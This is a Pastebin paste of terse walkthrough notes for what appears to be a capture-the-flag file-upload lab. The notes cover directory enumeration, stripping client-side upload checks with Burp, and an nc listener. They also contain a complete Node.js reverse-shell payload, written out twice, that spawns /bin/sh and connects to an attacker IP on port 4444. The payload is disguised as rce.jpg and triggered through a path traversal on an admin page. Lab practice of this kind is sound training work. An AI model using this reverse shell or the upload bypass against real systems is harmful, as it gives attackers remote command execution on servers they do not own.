Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- echo "10.10.XXX.XXX overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
- gobuster dir -u http://jewel.uploadvulns.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- Delete ^js$ in Burp options
- Burp intercept, ctrl+F5 catch upload.js get rid of file checks
- (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "10.10.xxx.xxx", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();
- var net = require("net"), sh = require("child_process").exec("/bin/bash");
- var client = new net.Socket();
- client.connect(4444, "10.9.158.221", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
- sh.stderr.pipe(client);});
- save it as rce.jpg
- nc -nlvp 4444
- upload the payload on http://jewel.uploadvulns.thm
- download UploadVulnsWordlist.txt from task
- gobuster dir -u http://jewel.uploadvulns.thm/content -w UploadVulnsWordlist.txt -x jpg
- uploaded payload name (XXX.jpg) is the 5th that's not ABH/LKG/SAD & YWJ
- ../content/XXX.jpg on http://jewel.uploadvulns.thm/admin
- nothing happend in 443 monitor
Add Comment
Please, Sign In to add comment
